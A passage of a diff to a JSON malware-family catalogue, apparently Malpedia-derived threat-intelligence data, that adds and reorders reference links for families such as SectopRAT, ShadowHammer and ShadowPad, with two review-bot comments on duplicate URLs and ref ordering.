- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
"https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/"
],
"synonyms": [
@@ -41001,25 +43228,23 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7429aaf8-85a8-4ae9-b583-c7eec0f5b0cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c",
"value": "SeaSalt"
},
{
- "description": "",
+ "description": "SectopRAT, aka ArechClient2, is a .NET RAT with numerous capabilities including multiple stealth functions. Arechclient2 can profile victim systems, steal information such as browser and crypto-wallet data, and launch a hidden secondary desktop to control browser sessions. Additionally, it has several anti-VM and anti-emulator capabilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat",
+ "https://cyberflorida.org/2022/11/arechclient2/",
+ "https://tampabay.tech/2022/11/30/arechclient2/",
+ "https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/",
+ "https://medium.com/@gi7w0rm/a-long-way-to-sectoprat-eb2f0aad6ec8",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
"https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html",
- "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers"
+ "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers",
+ "https://www.gdatasoftware.com/blog/2021/02/36633-new-version-adds-encrypted-communication",
+ "https://cdn-production.blackpointcyber.com/wp-content/uploads/2022/11/01161208/Blackpoint-Cyber-Ratting-out-Arechclient2-Whitepaper.pdf"
],
"synonyms": [
"1xxbot",
@@ -41051,15 +43276,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
"https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
- "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
],
"synonyms": [
"azzy",
@@ -41075,26 +43300,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed",
- "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
- "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
- "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/",
- "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/",
- "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
- "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
- "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
"https://blog.xpnsec.com/apt28-hospitality-malware-part-2/",
- "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
+ "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
+ "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
+ "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/",
+ "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
+ "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
+ "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
],
"synonyms": [
"GAMEFISH",
@@ -41126,16 +43351,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet",
- "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
"https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
"https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
"https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html"
],
"synonyms": [],
"type": []
@@ -41148,7 +43373,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake",
- "https://twitter.com/8th_grey_owl/status/1481433481485844483"
+ "https://twitter.com/8th_grey_owl/status/1481433481485844483",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -41199,6 +43425,19 @@
"uuid": "6025475a-b89d-401d-882d-50fe1b03154f",
"value": "Sepulcher"
},
+ {
+ "description": "This malware is protected using VMProtect and related to the loading of KEYPLUG.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serialvlogger",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0592daf4-5f68-4087-ad4e-efe773009ca6",
+ "value": "SerialVlogger"
+ },
{
"description": "",
"meta": {
@@ -41216,30 +43455,30 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper",
- "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
- "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
- "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
- "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
- "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
- "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://insights.oem.avira.com/ta505-apt-group-targets-americas/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners",
- "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
+ "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/"
+ "https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
+ "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
+ "https://insights.oem.avira.com/ta505-apt-group-targets-americas/",
+ "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56"
],
"synonyms": [],
"type": []
@@ -41266,8 +43505,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile",
"https://twitter.com/GrujaRS/status/1296856836944076802?s=20",
- "https://id-ransomware.blogspot.com/2020/02/sfile2-ransomware.html",
- "https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/"
+ "https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/",
+ "https://id-ransomware.blogspot.com/2020/02/sfile2-ransomware.html"
],
"synonyms": [
"Escal",
@@ -41283,37 +43522,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer",
- "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
- "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/",
- "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/",
- "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
- "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
- "https://www.youtube.com/watch?v=T5wPwvLrBYU",
- "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://blog.reversinglabs.com/blog/forging-the-shadowhammer",
- "https://mauronz.github.io/shadowhammer-backdoor",
- "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/",
- "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://securelist.com/operation-shadowhammer/89992/",
+ "https://mauronz.github.io/shadowhammer-backdoor",
+ "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/",
"https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html",
- "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/"
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
+ "https://www.youtube.com/watch?v=T5wPwvLrBYU",
+ "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
+ "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/",
+ "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/",
+ "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
+ "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/"
],
"synonyms": [
"DAYJOB"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c1815516-aa2a-43d2-9136-78a8feb054b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb",
"value": "shadowhammer"
},
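Review bot: `https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/` and `https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows` point to the same F-Secure post; keep one. This hunk also deletes the `related` link to `c1815516-aa2a-43d2-9136-78a8feb054b6`, consistent with the other `related` removals in this file, which should be called out in the commit message as a deliberate schema change if that is what it is.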
@@ -41322,55 +43552,60 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad",
- "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
- "https://www.ic3.gov/Media/News/2021/211220.pdf",
- "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
- "https://www.youtube.com/watch?v=55kaaMGBARM",
- "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/",
- "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
- "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
- "https://www.youtube.com/watch?v=r1zAVX_HnJg",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf",
- "https://community.riskiq.com/article/d8b749f2",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
- "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
- "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html",
- "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
- "https://www.secureworks.com/research/shadowpad-malware-analysis",
- "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://attack.mitre.org/groups/G0096",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf",
- "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.secureworks.com/research/shadowpad-malware-analysis",
+ "https://community.riskiq.com/article/d8b749f2",
+ "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html",
+ "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
+ "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf",
"https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
+ "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://www.youtube.com/watch?v=55kaaMGBARM",
+ "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://www.ic3.gov/Media/News/2021/211220.pdf",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
+ "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/",
+ "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
+ "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/",
+ "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
+ "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf",
+ "https://www.youtube.com/watch?v=r1zAVX_HnJg",
+ "https://www.youtube.com/watch?v=IRh6R8o1Q7U",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
+ "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/",
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
"https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
- "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
- "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
- "https://attack.mitre.org/groups/G0096",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
- "https://www.youtube.com/watch?v=IRh6R8o1Q7U",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns",
"https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
"https://www.youtube.com/watch?v=_fstHQSK-kk",
- "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf",
- "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
+ "https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
],
"synonyms": [
"POISONPLUG.SHADOW",
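Review bot: nearly all of the churn in this hunk is existing refs being reshuffled with no content change (the secureworks, riskiq and thehackernews URLs move to the top, the ptsecurity and drweb URLs move to the bottom), which buries the handful of genuine additions: the Elastic REF2924 update, the NCC Group ShadowPad intrusion analysis, the HITCON 2021 speakerdeck, the VB2022 paper and the additional YouTube/Dragos entries. Have the generator emit `refs` in a stable order (sorted, or the upstream Malpedia order preserved) so future diffs show only what was added or removed.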
@@ -41378,15 +43613,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2448a4e1-46e3-4c42-9fd1-f51f8ede58c1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7",
"value": "ShadowPad"
},
@@ -41395,8 +43621,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/"
],
"synonyms": [],
"type": []
@@ -41443,15 +43669,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
